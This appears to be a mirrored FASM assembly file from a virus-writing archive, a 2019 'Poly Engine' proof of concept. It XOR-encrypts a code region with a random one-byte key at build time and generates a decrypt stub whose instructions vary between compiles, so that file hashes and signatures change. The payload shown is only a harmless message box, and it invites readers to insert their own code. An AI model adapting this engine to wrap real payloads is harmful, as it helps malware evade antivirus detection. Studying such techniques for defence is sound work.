mirror of
https://github.com/vxunderground/VXUG-Papers.git
synced 2024-06-16 11:58:10 +00:00
105 lines
3.1 KiB
NASM
105 lines
3.1 KiB
NASM
|
; .__
|
|||
|
; _____ ____ ____ ____ | |__
|
|||
|
; / \ / _ \_/ ___\/ _ \| | \ Poly Engine
|
|||
|
;| Y Y ( <_> ) \__( <_> ) Y \
|
|||
|
;|__|_| /\____/ \___ >____/|___| /
|
|||
|
; \/ \/ \/
|
|||
|
;
|
|||
|
; [+] Simple Polymorphic PoC (code and decrypt routine)
|
|||
|
; [+] 1byte XOR random key
|
|||
|
; [+] The engine can change the key, and some instructions (code and order)
|
|||
|
; [+] This is not new, not advanced... Just for education purposes
|
|||
|
;
|
|||
|
; By: SWaNk 2019 - Back in business, VX forever!
|
|||
|
;
|
|||
|
;https://pt.wikipedia.org/wiki/Moc<6F> (Kerodon rupestris)
|
|||
|
|
|||
|
format PE GUI 4.0
|
|||
|
entry start
|
|||
|
|
|||
|
include "%include%/win32a.inc"
|
|||
|
|
|||
|
; This is the poly encryption macro (1 byte xor).
|
|||
|
; It is a simple XOR random 0x00 to 0xFF at compilation time.
|
|||
|
;This is just a example how this can be done... Use your imagination to improve
|
|||
|
|
|||
|
macro encrypt dstart,dsize {
|
|||
|
local ..char
|
|||
|
|
|||
|
key = %t and 0xff
|
|||
|
|
|||
|
repeat dsize
|
|||
|
load ..char from dstart+%-1
|
|||
|
..char = ..char xor key
|
|||
|
store ..char at dstart+%-1
|
|||
|
end repeat
|
|||
|
}
|
|||
|
|
|||
|
;The idea was to create a didactic macro. this guy will split the 1 byte range in 2 (0xff / 2 = 0x7f)
|
|||
|
;
|
|||
|
;If the pseudo random key is bigger than 0x7f, edx will receive the real_start then ecx will receive
|
|||
|
;the code_size. if the key is smaller than 0x7f, the order chage
|
|||
|
;
|
|||
|
;If the pseudo random key is bigger than 0x7f, the increase of edx will be made with "inc edx" otherwise
|
|||
|
;with "add edx, 1"
|
|||
|
|
|||
|
macro simplePoly {
|
|||
|
if key > 0x7f
|
|||
|
mov edx,real_start
|
|||
|
mov ecx,code_size
|
|||
|
else
|
|||
|
mov ecx,code_size
|
|||
|
mov edx,real_start
|
|||
|
end if
|
|||
|
|
|||
|
@@: xor byte [edx],key
|
|||
|
|
|||
|
if key > 0x7f
|
|||
|
inc edx
|
|||
|
else
|
|||
|
add edx,1
|
|||
|
end if
|
|||
|
|
|||
|
loop @B
|
|||
|
}
|
|||
|
|
|||
|
;this macro will generate this instructions starting at the entry point
|
|||
|
|
|||
|
; mov edx,mocoh.401010 | The order of this instructions
|
|||
|
; mov ecx,1C | can change
|
|||
|
|
|||
|
; xor byte ptr ds:[edx],F4 | The key will change (this case is F4)
|
|||
|
; inc edx | This can change to "add edx, 1"
|
|||
|
; loop mocoh.40100A
|
|||
|
|
|||
|
;============================================================
|
|||
|
section ".code" code readable writeable
|
|||
|
;============================================================
|
|||
|
start:
|
|||
|
|
|||
|
simplePoly
|
|||
|
|
|||
|
real_start:
|
|||
|
|
|||
|
; Add your code here, start of encrypted code
|
|||
|
|
|||
|
stdcall [MessageBox],0,msg,title,MB_ICONASTERISK
|
|||
|
stdcall [ExitProcess],0
|
|||
|
|
|||
|
; end of encrypted code
|
|||
|
|
|||
|
|
|||
|
display "Encrypting this shit... "
|
|||
|
code_size = $ - real_start
|
|||
|
encrypt real_start,code_size
|
|||
|
display "done",13,10
|
|||
|
|
|||
|
;============================================================
|
|||
|
section ".data" data readable writeable import
|
|||
|
;============================================================
|
|||
|
library kernel32,"kernel32.dll",user32,"user32.dll"
|
|||
|
include "%include%/api/kernel32.inc"
|
|||
|
include "%include%/api/user32.inc"
|
|||
|
|
|||
|
title db "SWaNk 2019",0
|
|||
|
msg db "compile 2 times and compare the hashes and decryption instruction bitches!",0
|